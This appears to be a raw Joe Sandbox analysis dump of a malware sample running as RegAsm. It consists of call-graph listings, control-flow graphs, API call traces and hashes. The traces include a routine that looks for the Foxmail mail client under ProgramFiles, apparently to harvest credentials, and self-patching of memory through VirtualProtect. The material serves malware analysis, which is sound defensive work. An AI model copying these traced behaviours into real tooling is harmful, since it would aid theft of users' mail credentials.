6395->6392 6397 100087c4 GetStringTypeW 6395->6397 6396->6389 6397->6392 6399 100054a7 __fassign 36 API calls 6398->6399 6400 10008a51 6399->6400 6407 10008821 6400->6407 6404 1000880d 6403->6404 6405 1000881e 6403->6405 6404->6405 6406 1000571e _free 19 API calls 6404->6406 6405->6396 6406->6405 6408 1000883c 6407->6408 6409 10008862 MultiByteToWideChar 6408->6409 6410 10008a16 6409->6410 6411 1000888c 6409->6411 6412 10002ada _ValidateLocalCookies 5 API calls 6410->6412 6416 100056d0 20 API calls 6411->6416 6418 100088ad 6411->6418 6413 10006b87 6412->6413 6413->6382 6414 100088f6 MultiByteToWideChar 6415 10008962 6414->6415 6417 1000890f 6414->6417 6420 10008801 __freea 19 API calls 6415->6420 6416->6418 6434 10005f19 6417->6434 6418->6414 6418->6415 6420->6410 6422 10008971 6424 100056d0 20 API calls 6422->6424 6428 10008992 6422->6428 6423 10008939 6423->6415 6425 10005f19 10 API calls 6423->6425 6424->6428 6425->6415 6426 10008a07 6427 10008801 __freea 19 API calls 6426->6427 6427->6415 6428->6426 6429 10005f19 10 API calls 6428->6429 6430 100089e6 6429->6430 6430->6426 6431 100089f5 WideCharToMultiByte 6430->6431 6431->6426 6432 10008a35 6431->6432 6433 10008801 __freea 19 API calls 6432->6433 6433->6415 6435 10005c45 _abort 4 API calls 6434->6435 6436 10005f40 6435->6436 6439 10005f49 6436->6439 6442 10005fa1 6436->6442 6440 10002ada _ValidateLocalCookies 5 API calls 6439->6440 6441 10005f9b 6440->6441 6441->6415 6441->6422 6441->6423 6443 10005c45 _abort 4 API calls 6442->6443 6444 10005fc8 6443->6444 6445 10002ada _ValidateLocalCookies 5 API calls 6444->6445 6446 10005f89 LCMapStringW 6445->6446 6446->6439 6448 10006892 ___scrt_is_nonwritable_in_current_image 6447->6448 6455 10005671 RtlEnterCriticalSection 6448->6455 6450 1000689c 6456 100068f1 6450->6456 6454 100068b5 _abort 6454->5930 6455->6450 6468 10007011 6456->6468 6458 1000693f 6459 10007011 25 API calls 6458->6459 6460 1000695b 6459->6460 6461 10007011 25 API calls 6460->6461 6462 10006979 6461->6462 6463 100068a9 6462->6463 6464 1000571e _free 19 API calls 6462->6464 6465 100068bd 6463->6465 6464->6463 6482 100056b9 RtlLeaveCriticalSection 6465->6482 6467 100068c7 6467->6454 6469 10007022 6468->6469 6477 1000701e 6468->6477 6470 10007029 6469->6470 6474 1000703c ___scrt_fastfail 6469->6474 6471 10006368 __dosmaperr 19 API calls 6470->6471 6472 1000702e 6471->6472 6473 100062ac _abort 25 API calls 6472->6473 6473->6477 6475 10007073 6474->6475 6476 1000706a 6474->6476 6474->6477 6475->6477 6479 10006368 __dosmaperr 19 API calls 6475->6479 6478 10006368 __dosmaperr 19 API calls 6476->6478 6477->6458 6480 1000706f 6478->6480 6479->6480 6481 100062ac _abort 25 API calls 6480->6481 6481->6477 6482->6467 7512 10007260 GetStartupInfoW 7513 10007286 7512->7513 7514 10007318 7512->7514 7513->7514 7518 10008be3 7513->7518 7516 100072af 7516->7514 7517 100072dd GetFileType 7516->7517 7517->7516 7519 10008bef ___scrt_is_nonwritable_in_current_image 7518->7519 7520 10008c13 7519->7520 7521 10008bfc 7519->7521 7531 10005671 RtlEnterCriticalSection 7520->7531 7523 10006368 __dosmaperr 19 API calls 7521->7523 7524 10008c01 7523->7524 7525 100062ac _abort 25 API calls 7524->7525 7526 10008c0b _abort 7525->7526 7526->7516 7529 10008c1f 7530 10008c4b 7529->7530 7532 10008b34 7529->7532 7539 10008c72 7530->7539 7531->7529 7533 1000637b _abort 19 API calls 7532->7533 7535 10008b46 7533->7535 7534 1000571e _free 19 API calls 7536 10008ba5 7534->7536 7537 10005eb7 10 API calls 7535->7537 7538 10008b53 7535->7538 7536->7529 7537->7535 7538->7534 7542 100056b9 RtlLeaveCriticalSection 7539->7542 7541 10008c79 7541->7526 7542->7541 7651 100081a0 7652 100081d9 7651->7652 7653 100081dd 7652->7653 7664 10008205 7652->7664 7654 10006368 __dosmaperr 19 API calls 7653->7654 7655 100081e2 7654->7655 7657 100062ac _abort 25 API calls 7655->7657 7656 10008529 7658 10002ada _ValidateLocalCookies 5 API calls 7656->7658 7659 100081ed 7657->7659 7660 10008536 7658->7660 7661 10002ada _ValidateLocalCookies 5 API calls 7659->7661 7663 100081f9 7661->7663 7664->7656 7665 100080c0 7664->7665 7668 100080db 7665->7668 7666 10002ada _ValidateLocalCookies 5 API calls 7667 10008152 7666->7667 7667->7664 7668->7666 7852 1000a1e0 7855 1000a1fe 7852->7855 7854 1000a1f6 7856 1000a203 7855->7856 7857 1000aa53 20 API calls 7856->7857 7859 1000a298 7856->7859 7858 1000a42f 7857->7858 7858->7854 7859->7854 7543 10009d61 7544 10009d81 7543->7544 7547 10009db8 7544->7547 7546 10009dab 7548 10009dbf 7547->7548 7549 10009e20 7548->7549 7550 10009ddf 7548->7550 7551 1000aa17 20 API calls 7549->7551 7552 1000a90e 7549->7552 7550->7552 7554 1000aa17 20 API calls 7550->7554 7553 10009e6e 7551->7553 7552->7546 7553->7546 7555 1000a93e 7554->7555 7555->7546 7669 100021a1 ___scrt_dllmain_exception_filter 6483 1000c7a7 6484 1000c7be 6483->6484 6489 1000c82c 6483->6489 6484->6489 6493 1000c7e6 GetModuleHandleA 6484->6493 6485 1000c872 6486 1000c835 GetModuleHandleA 6488 1000c83f 6486->6488 6488->6488 6488->6489 6489->6485 6489->6486 6490 1000c7dd 6490->6489 6491 1000c80d VirtualProtect 6490->6491 6491->6489 6492 1000c81c VirtualProtect 6491->6492 6492->6489 6494 1000c7ef 6493->6494 6499 1000c82c 6493->6499 6503 1000c803 6494->6503 6496 1000c872 6497 1000c835 GetModuleHandleA 6498 1000c83f 6497->6498 6498->6498 6498->6499 6499->6496 6499->6497 6500 1000c7f4 6500->6499 6501 1000c80d VirtualProtect 6500->6501 6501->6499 6502 1000c81c VirtualProtect 6501->6502 6502->6499 6504 1000c809 6503->6504 6505 1000c82c 6504->6505 6506 1000c80d VirtualProtect 6504->6506 6508 1000c872 6505->6508 6509 1000c835 GetModuleHandleA 6505->6509 6506->6505 6507 1000c81c VirtualProtect 6506->6507 6507->6505 6510 1000c83f 6509->6510 6510->6505 7015 1000742b 7016 10007430 7015->7016 7018 10007453 7016->7018 7019 10008bae 7016->7019 7020 10008bdd 7019->7020 7021 10008bbb 7019->7021 7020->7016 7022 10008bd7 7021->7022 7023 10008bc9 RtlDeleteCriticalSection 7021->7023 7024 1000571e _free 19 API calls 7022->7024 7023->7022 7023->7023 7024->7020 7556 1000ac6b 7557 1000ac84 __startOneArgErrorHandling 7556->7557 7559 1000acad __startOneArgErrorHandling 7557->7559 7560 1000b2f0 7557->7560 7561 1000b329 __startOneArgErrorHandling 7560->7561 7562 1000b5c1 __raise_exc RaiseException 7561->7562 7563 1000b350 __startOneArgErrorHandling 7561->7563 7562->7563 7564 1000b393 7563->7564 7565 1000b36e 7563->7565 7566 1000b8b2 __startOneArgErrorHandling 19 API calls 7564->7566 7571 1000b8e1 7565->7571 7568 1000b38e __startOneArgErrorHandling 7566->7568 7569 10002ada _ValidateLocalCookies 5 API calls 7568->7569 7570 1000b3b7 7569->7570 7570->7559 7572 1000b8f0 7571->7572 7573 1000b964 __startOneArgErrorHandling 7572->7573 7574 1000b90f __startOneArgErrorHandling 7572->7574 7576 1000b8b2 __startOneArgErrorHandling 19 API calls 7573->7576 7575 100078a3 __startOneArgErrorHandling 5 API calls 7574->7575 7577 1000b950 7575->7577 7579 1000b95d 7576->7579 7578 1000b8b2 __startOneArgErrorHandling 19 API calls 7577->7578 7577->7579 7578->7579 7579->7568 7670 100060ac 7671 100060dd 7670->7671 7673 100060b7 7670->7673 7672 100060c7 FreeLibrary 7672->7673 7673->7671 7673->7672 7580 1000506f 7581 10005081 7580->7581 7582 10005087 7580->7582 7583 10005000 19 API calls 7581->7583 7583->7582 7025 10005630 7026 1000563b 7025->7026 7028 10005664 7026->7028 7029 10005660 7026->7029 7031 10005eb7 7026->7031 7038 10005688 7028->7038 7032 10005c45 _abort 4 API calls 7031->7032 7033 10005ede 7032->7033 7034 10005efc InitializeCriticalSectionAndSpinCount 7033->7034 7035 10005ee7 7033->7035 7034->7035 7036 10002ada _ValidateLocalCookies 5 API calls 7035->7036 7037 10005f13 7036->7037 7037->7026 7039 100056b4 7038->7039 7040 10005695 7038->7040 7039->7029 7041 1000569f RtlDeleteCriticalSection 7040->7041 7041->7039 7041->7041 7584 10003370 7595 10003330 7584->7595 7596 10003342 7595->7596 7597 1000334f 7595->7597 7598 10002ada _ValidateLocalCookies 5 API calls 7596->7598 7598->7597 7860 100063f0 7861 10006400 7860->7861 7872 10006416 7860->7872 7862 10006368 __dosmaperr 19 API calls 7861->7862 7863 10006405 7862->7863 7864 100062ac _abort 25 API calls 7863->7864 7866 1000640f 7864->7866 7865 10004e76 19 API calls 7869 100064e5 7865->7869 7868 100064ee 7870 1000571e _free 19 API calls 7868->7870 7869->7868 7876 10006573 7869->7876 7890 100085eb 7869->7890 7871 10006561 7870->7871 7899 1000679a 7871->7899 7872->7871 7873 10006480 7872->7873 7879 10006580 7872->7879 7873->7865 7877 100062bc _abort 11 API calls 7876->7877 7878 1000657f 7877->7878 7880 1000658c 7879->7880 7880->7880 7881 1000637b _abort 19 API calls 7880->7881 7882 100065ba 7881->7882 7883 100085eb 25 API calls 7882->7883 7884 100065e6 7883->7884 7885 100062bc _abort 11 API calls 7884->7885 7886 10006615 ___scrt_fastfail 7885->7886 7887 100066b6 FindFirstFileExA 7886->7887 7888 10006705 7887->7888 7889 10006580 25 API calls 7888->7889 7891 1000853a 7890->7891 7893 10008554 7891->7893 7894 1000854f 7891->7894 7896 1000858b 7891->7896 7892 10006368 __dosmaperr 19 API calls 7898 1000857a 7892->7898 7893->7869 7894->7892 7894->7893 7895 100062ac _abort 25 API calls 7895->7893 7896->7893 7897 10006368 __dosmaperr 19 API calls 7896->7897 7897->7898 7898->7895 7900 100067a4 7899->7900 7901 100067b4 7900->7901 7902 1000571e _free 19 API calls 7900->7902 7903 1000571e _free 19 API calls 7901->7903 7902->7900 7904 100067bb 7903->7904 7904->7866 7599 10009e71 7600 10009e95 7599->7600 7601 10009ee6 7600->7601 7603 10009f71 __startOneArgErrorHandling 7600->7603 7604 10009ef8 7601->7604 7607 1000aa53 7601->7607 7605 1000b2f0 20 API calls 7603->7605 7606 1000acad __startOneArgErrorHandling 7603->7606 7605->7606 7608 1000aa70 RtlDecodePointer 7607->7608 7609 1000aa80 7607->7609 7608->7609 7610 1000ab0d 7609->7610 7613 1000ab02 7609->7613 7615 1000aab7 7609->7615 7610->7613 7614 10006368 __dosmaperr 19 API calls 7610->7614 7611 10002ada _ValidateLocalCookies 5 API calls 7612 1000ac67 7611->7612 7612->7604 7613->7611 7614->7613 7615->7613 7616 10006368 __dosmaperr 19 API calls 7615->7616 7616->7613 7678 10003eb3 7679 10005411 36 API calls 7678->7679 7680 10003ebb 7679->7680 7042 1000543d 7043 10005440 7042->7043 7044 100055a8 _abort 36 API calls 7043->7044 7045 1000544c 7044->7045 6813 10001f3f 6814 10001f4b ___scrt_is_nonwritable_in_current_image 6813->6814 6831 1000247c 6814->6831 6816 10001f52 6817 10002041 6816->6817 6818 10001f7c 6816->6818 6825 10001f57 ___scrt_is_nonwritable_in_current_image 6816->6825 6854 10002639 IsProcessorFeaturePresent 6817->6854 6842 100023de 6818->6842 6821 10002048 6822 10001f8b __RTC_Initialize 6822->6825 6845 100022fc RtlInitializeSListHead 6822->6845 6824 10001f99 ___scrt_initialize_default_local_stdio_options 6846 100046c5 6824->6846 6829 10001fb8 6829->6825 6830 10004669 _abort 5 API calls 6829->6830 6830->6825 6832 10002485 6831->6832 6858 10002933 IsProcessorFeaturePresent 6832->6858 6836 10002496 6837 1000249a 6836->6837 6869 100053c8 6836->6869 6837->6816 6840 100024b1 6840->6816 6925 100024b5 6842->6925 6844 100023e5 6844->6822 6845->6824 6849 100046dc 6846->6849 6847 10002ada _ValidateLocalCookies 5 API calls 6848 10001fad 6847->6848 6848->6825 6850 100023b3 6848->6850 6849->6847 6851 100023b8 ___scrt_release_startup_lock 6850->6851 6852 10002933 ___isa_available_init IsProcessorFeaturePresent 6851->6852 6853 100023c1 6851->6853 6852->6853 6853->6829 6855 1000264e ___scrt_fastfail 6854->6855 6856 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6855->6856 6857 10002744 ___scrt_fastfail 6856->6857 6857->6821 6859 10002491 6858->6859 6860 100034ea 6859->6860 6861 100034ef ___vcrt_initialize_winapi_thunks 6860->6861 6880 10003936 6861->6880 6864 100034fd 6864->6836 6866 10003505 6867 10003510 6866->6867 6894 10003972 6866->6894 6867->6836 6917 10007457 6869->6917 6872 10003529 6873 10003532 6872->6873 6874 10003543 6872->6874 6875 1000391b ___vcrt_uninitialize_ptd 5 API calls 6873->6875 6874->6837 6876 10003537 6875->6876 6877 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6876->6877 6878 1000353c 6877->6878 6921 10003c50 6878->6921 6882 1000393f 6880->6882 6883 10003968 6882->6883 6884 100034f9 6882->6884 6898 10003be0 6882->6898 6885 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6883->6885 6884->6864 6886 100038e8 6884->6886 6885->6884 6903 10003af1 6886->6903 6889 100038fd 6889->6866 6890 10003ba2 ___vcrt_FlsSetValue 5 API calls 6891 1000390b 6890->6891 6892 10003918 6891->6892 6908 1000391b 6891->6908 6892->6866 6895 1000399c 6894->6895 6896 1000397d 6894->6896 6895->6864 6897 10003987 RtlDeleteCriticalSection 6896->6897 6897->6895 6897->6897 6899 10003a82 try_get_function 4 API calls 6898->6899 6900 10003bfa 6899->6900 6901 10003c18 InitializeCriticalSectionAndSpinCount 6900->6901 6902 10003c03 6900->6902 6901->6902 6902->6882 6904 10003a82 try_get_function 4 API calls 6903->6904 6905 10003b0b 6904->6905 6906 10003b24 TlsAlloc 6905->6906 6907 100038f2 6905->6907 6907->6889 6907->6890 6909 1000392b 6908->6909 6910 10003925 6908->6910 6909->6889 6912 10003b2c 6910->6912 6913 10003a82 try_get_function 4 API calls 6912->6913 6914 10003b46 6913->6914 6915 10003b5e TlsFree 6914->6915 6916 10003b52 6914->6916 6915->6916 6916->6909 6920 10007470 6917->6920 6918 10002ada _ValidateLocalCookies 5 API calls 6919 100024a3 6918->6919 6919->6840 6919->6872 6920->6918 6922 10003c7f 6921->6922 6923 10003c59 6921->6923 6922->6874 6923->6922 6924 10003c69 FreeLibrary 6923->6924 6924->6923 6926 100024c4 6925->6926 6927 100024c8 6925->6927 6926->6844 6928 10002639 ___scrt_fastfail 4 API calls 6927->6928 6930 100024d5 ___scrt_release_startup_lock 6927->6930 6929 10002559 6928->6929 6930->6844 6931 10005bff 6939 10005d5c 6931->6939 6934 10005c13 6935 10005b7a _abort 19 API calls 6936 10005c1b 6935->6936 6937 10005c28 6936->6937 6946 10005c2b 6936->6946 6940 10005c45 _abort 4 API calls 6939->6940 6941 10005d83 6940->6941 6942 10005d9b TlsAlloc 6941->6942 6943 10005d8c 6941->6943 6942->6943 6944 10002ada _ValidateLocalCookies 5 API calls 6943->6944 6945 10005c09 6944->6945 6945->6934 6945->6935 6947 10005c3b 6946->6947 6948 10005c35 6946->6948 6947->6934 6950 10005db2 6948->6950 6951 10005c45 _abort 4 API calls 6950->6951 6952 10005dd9 6951->6952 6953 10005df1 TlsFree 6952->6953 6954 10005de5 6952->6954 6953->6954 6955 10002ada _ValidateLocalCookies 5 API calls 6954->6955 6956 10005e02 6955->6956 6956->6947 7681 100067bf 7686 100067f4 7681->7686 7684 100067db 7685 1000571e _free 19 API calls 7685->7684 7687 100067cd 7686->7687 7688 10006806 7686->7688 7687->7684 7687->7685 7689 10006836 7688->7689 7690 1000680b 7688->7690 7689->7687 7697 100071d6 7689->7697 7691 1000637b _abort 19 API calls 7690->7691 7692 10006814 7691->7692 7694 1000571e _free 19 API calls 7692->7694 7694->7687 7695 10006851 7696 1000571e _free 19 API calls 7695->7696 7696->7687 7698 100071e1 7697->7698 7699 10007209 7698->7699 7700 100071fa 7698->7700 7701 10007218 7699->7701 7706 10008a98 7699->7706 7702 10006368 __dosmaperr 19 API calls 7700->7702 7713 10008acb 7701->7713 7705 100071ff ___scrt_fastfail 7702->7705 7705->7695 7707 10008aa3 7706->7707 7708 10008ab8 RtlSizeHeap 7706->7708 7709 10006368 __dosmaperr 19 API calls 7707->7709 7708->7701 7710 10008aa8 7709->7710 7711 100062ac _abort 25 API calls 7710->7711 7712 10008ab3 7711->7712 7712->7701 7714 10008ae3 7713->7714 7715 10008ad8 7713->7715 7717 10008af4 _abort 7714->7717 7718 10008aeb 7714->7718 7716 100056d0 20 API calls 7715->7716 7723 10008ae0 7716->7723 7719 10008af9 7717->7719 7720 10008b1e RtlReAllocateHeap 7717->7720 7724 1000474f _abort 7 API calls 7717->7724 7721 1000571e _free 19 API calls 7718->7721 7722 10006368 __dosmaperr 19 API calls 7719->7722 7720->7717 7720->7723 7721->7723 7722->7723 7723->7705 7724->7717

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1083526818-0
                                                                                                                                                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 54 10008821-1000883a 55 10008850-10008855 54->55 56 1000883c-1000884c call 10009341 54->56 58 10008862-10008886 MultiByteToWideChar 55->58 59 10008857-1000885f 55->59 56->55 63 1000884e 56->63 61 10008a19-10008a2c call 10002ada 58->61 62 1000888c-10008898 58->62 59->58 64 1000889a-100088ab 62->64 65 100088ec 62->65 63->55 68 100088ca-100088db call 100056d0 64->68 69 100088ad-100088bc call 1000bf20 64->69 67 100088ee-100088f0 65->67 71 100088f6-10008909 MultiByteToWideChar 67->71 72 10008a0e 67->72 68->72 82 100088e1 68->82 69->72 81 100088c2-100088c8 69->81 71->72 75 1000890f-10008921 call 10005f19 71->75 76 10008a10-10008a17 call 10008801 72->76 84 10008926-1000892a 75->84 76->61 83 100088e7-100088ea 81->83 82->83 83->67 84->72 86 10008930-10008937 84->86 87 10008971-1000897d 86->87 88 10008939-1000893e 86->88 90 100089c9 87->90 91 1000897f-10008990 87->91 88->76 89 10008944-10008946 88->89 89->72 94 1000894c-10008966 call 10005f19 89->94 95 100089cb-100089cd 90->95 92 10008992-100089a1 call 1000bf20 91->92 93 100089ab-100089bc call 100056d0 91->93 99 10008a07-10008a0d call 10008801 92->99 106 100089a3-100089a9 92->106 93->99 108 100089be 93->108 94->76 109 1000896c 94->109 95->99 100 100089cf-100089e8 call 10005f19 95->100 99->72 100->99 112 100089ea-100089f1 100->112 111 100089c4-100089c7 106->111 108->111 109->72 111->95 113 100089f3-100089f4 112->113 114 10008a2d-10008a33 112->114 115 100089f5-10008a05 WideCharToMultiByte 113->115 114->115 115->99 116 10008a35-10008a3c call 10008801 115->116 116->76
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 119 1000c7e6-1000c7ed GetModuleHandleA 120 1000c82d 119->120 121 1000c7ef-1000c7fe call 1000c803 119->121 123 1000c82f-1000c833 120->123 131 1000c800 121->131 132 1000c865 121->132 124 1000c872 call 1000c877 123->124 125 1000c835-1000c83d GetModuleHandleA 123->125 128 1000c83f-1000c847 125->128 128->128 130 1000c849-1000c84c 128->130 130->123 133 1000c84e-1000c850 130->133 135 1000c809-1000c80b 131->135 136 1000c804 call 1000c897 131->136 134 1000c866-1000c86e 132->134 137 1000c852-1000c854 133->137 138 1000c856-1000c85e 133->138 143 1000c870 134->143 135->120 140 1000c80d-1000c81a VirtualProtect 135->140 136->135 141 1000c85f-1000c860 call 1000c897 137->141 138->141 144 1000c82c 140->144 145 1000c81c-1000c82a VirtualProtect 140->145 141->132 143->130 144->120 145->144
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2905821283-0
                                                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
